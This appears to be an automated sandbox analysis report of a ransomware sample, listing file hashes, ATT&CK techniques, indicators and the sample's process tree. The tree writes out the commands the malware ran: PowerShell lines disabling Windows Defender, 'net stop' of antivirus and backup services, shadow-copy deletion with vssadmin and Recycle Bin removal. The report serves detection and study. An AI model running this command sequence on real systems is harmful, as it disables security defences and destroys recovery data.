1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
7s
max time network
155s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
Size

87KB
MD5

f889c06ea602eb23ff52c32fe68a2681
SHA1

0a65a614602f220e2c16aeb6b849b1cd86cc748c
SHA256

21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448
SHA512

caf4bc0ed5195d882d84dc8c6b431fb0aefe001a724d022f846f423983cbaf3d8753f849e58f1b91406d2905798d41b4f4f53540024b5c6fe2edc3eb254276dc

Score

10^/10

discovery evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

5472 icacls.exe
5876 icacls.exe
6600 icacls.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
5472	icacls.exe
5876	icacls.exe
6600	icacls.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
6152	vssadmin.exe
5168	vssadmin.exe
5848	vssadmin.exe
4832	vssadmin.exe
5804	vssadmin.exe
6160	vssadmin.exe
4116	vssadmin.exe
6176	vssadmin.exe
5964	vssadmin.exe
5872	vssadmin.exe
6016	vssadmin.exe
6124	vssadmin.exe
6084	vssadmin.exe
6168	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4972	taskkill.exe
4208	taskkill.exe
5316	taskkill.exe
5644	taskkill.exe
2012	taskkill.exe
4580	taskkill.exe
5104	taskkill.exe
5176	taskkill.exe
4400	taskkill.exe
6976	taskkill.exe
5680	taskkill.exe
6216	taskkill.exe
5924	taskkill.exe
6188	taskkill.exe
5544	taskkill.exe
4928	taskkill.exe
6888	taskkill.exe
6932	taskkill.exe
5944	taskkill.exe
5992	taskkill.exe
2252	taskkill.exe
1396	taskkill.exe
6856	taskkill.exe
1652	taskkill.exe
2616	taskkill.exe
6176	taskkill.exe
6780	taskkill.exe
4848	taskkill.exe
4284	taskkill.exe
1444	taskkill.exe
6116	taskkill.exe
6280	taskkill.exe
5216	taskkill.exe
2368	taskkill.exe
6972	taskkill.exe
6208	taskkill.exe
5508	taskkill.exe
5444	taskkill.exe
5536	taskkill.exe
5220	taskkill.exe
1520	taskkill.exe
4396	taskkill.exe
5852	taskkill.exe
3768	taskkill.exe
4664	taskkill.exe
5996	taskkill.exe
3404	taskkill.exe
5476	taskkill.exe
4888	taskkill.exe
6464	taskkill.exe
6804	taskkill.exe
4968	taskkill.exe
1540	taskkill.exe
6104	taskkill.exe
5516	taskkill.exe
6160	taskkill.exe
6008	taskkill.exe
6484	taskkill.exe
2492	taskkill.exe
5004	taskkill.exe
5580	taskkill.exe
4168	taskkill.exe
4300	taskkill.exe
7056	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

5372 reg.exe
1008 reg.exe
3724 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

7136 PING.EXE

pid	process
5372	reg.exe
1008	reg.exe
3724	reg.exe

pid	process
7136	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exepowershell.exe

pid	process
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
1364	powershell.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
1364	powershell.exe
1364	powershell.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenet1.exetaskkill.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeIncreaseQuotaPrivilege	1364	powershell.exe
Token: SeSecurityPrivilege	1364	powershell.exe
Token: SeTakeOwnershipPrivilege	1364	powershell.exe
Token: SeLoadDriverPrivilege	1364	powershell.exe
Token: SeSystemProfilePrivilege	1364	powershell.exe
Token: SeSystemtimePrivilege	1364	powershell.exe
Token: SeProfSingleProcessPrivilege	1364	powershell.exe
Token: SeIncBasePriorityPrivilege	1364	powershell.exe
Token: SeCreatePagefilePrivilege	1364	powershell.exe
Token: SeBackupPrivilege	1364	powershell.exe
Token: SeRestorePrivilege	1364	powershell.exe
Token: SeShutdownPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeSystemEnvironmentPrivilege	1364	powershell.exe
Token: SeRemoteShutdownPrivilege	1364	powershell.exe
Token: SeUndockPrivilege	1364	powershell.exe
Token: SeManageVolumePrivilege	1364	powershell.exe
Token: 33	1364	powershell.exe
Token: 34	1364	powershell.exe
Token: 35	1364	powershell.exe
Token: 36	1364	powershell.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeDebugPrivilege	1004	net1.exe
Token: SeDebugPrivilege	1724	taskkill.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2192
Token: SeDebugPrivilege	4164	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe

description	pid	process	target process
PID 3656 wrote to memory of 1364	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 1364	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 2108	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 2108	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 3960	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 3960	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 2204	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 2204	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 1216	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 1216	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 1004	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 1004	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 1724	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 1724	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 2192	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 2192	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 2392	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 2392	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 4164	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 4164	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	powershell.exe
PID 3656 wrote to memory of 4292	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	Conhost.exe
PID 3656 wrote to memory of 4292	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	Conhost.exe
PID 3656 wrote to memory of 4412	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	net.exe
PID 3656 wrote to memory of 4412	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	net.exe
PID 3656 wrote to memory of 4528	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	Conhost.exe
PID 3656 wrote to memory of 4528	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	Conhost.exe
PID 3656 wrote to memory of 4620	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	Conhost.exe
PID 3656 wrote to memory of 4620	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	Conhost.exe
PID 3656 wrote to memory of 4664	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	net.exe
PID 3656 wrote to memory of 4664	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	net.exe
PID 3656 wrote to memory of 4696	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	net1.exe
PID 3656 wrote to memory of 4696	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	net1.exe
PID 3656 wrote to memory of 4740	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	net.exe
PID 3656 wrote to memory of 4740	3656	21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  PID:1004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  PID:1724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  PID:2192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4528
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:2348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:4664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:4248
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4556
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:4740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:4732
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:4796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5192
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:5304
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5372
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:4956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:5016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:5972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:6008
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:6116
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:4880
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:6912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5932
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6932
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:4224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:6220
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:6088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:5196
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6016
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:6184
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6176
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6168
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6160
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6152
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5168
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6124
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5964
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6084
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5848
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4832
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5872
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5804
